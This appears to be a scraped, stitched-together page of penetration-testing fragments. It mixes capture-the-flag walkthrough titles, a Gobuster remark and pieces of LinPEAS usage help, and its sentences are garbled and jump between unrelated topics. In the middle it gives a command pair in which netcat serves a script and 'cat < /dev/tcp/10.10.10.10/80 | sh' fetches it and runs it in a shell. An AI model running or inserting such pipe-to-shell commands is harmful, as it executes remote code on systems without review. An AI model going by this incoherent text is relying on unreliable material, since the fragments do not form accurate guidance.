The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags: dir to specify the scan should be done against directories and files . TryHackMe: 0day Walkthrough - Threatninja.net Transfer it to the target machine. Linux Privilege Escalation Techniques using SUID - MacroSEC Shenron 1 Walkthrough - Vulnhub - Writeup — Security - NepCodeX HTB ScriptKiddie Walkthrough HTTP Request Smuggling / HTTP Desync Attack. Install aha and wkhtmltopdf to generate a nice PDF: The links are included in relevant sections of the output that shows files that relate to each vulnerability or exploit. We can leverage LinPEAS to help automate a lot of the interesting stuff. By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). linpeas.sh $ nc -q 5 -lvnp 80 < linpeas.sh $ cat < /dev/tcp/10.10.10.10/80 | sh Output to file $ linpeas -a > /dev/shm/linpeas.txt $ less -r /dev/shm/linpeas.txt Options -h To show this message -q Do not show banner -a All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly -s SuperFast (don't check some time consuming checks) - Stealth mode The easiest way to run .sh shell script in Linux or UNIX is to type the following commands. Open Redirect. Write the script file using nano script-name-here.sh. Output to file: 1 /tmp/linpeas.sh -a > /dev/shm/linpeas.txt. hop-by-hop headers. Vulnhub - Driftingblues 1 - Walkthrough - Writeup — Security LinPEAS Legend. The linpeas script will do a lot of scans, so the output can get overwhelming on the terminal. Poison — Hack The Box [Write-up] | 0x3ashry's Blog With further enumeration we discover we are inside a docker container, and we use a simple well known technique to escape . Where SERVER_ADDRESS is the URL of the server and FILENAME is the name of the file to be downloaded.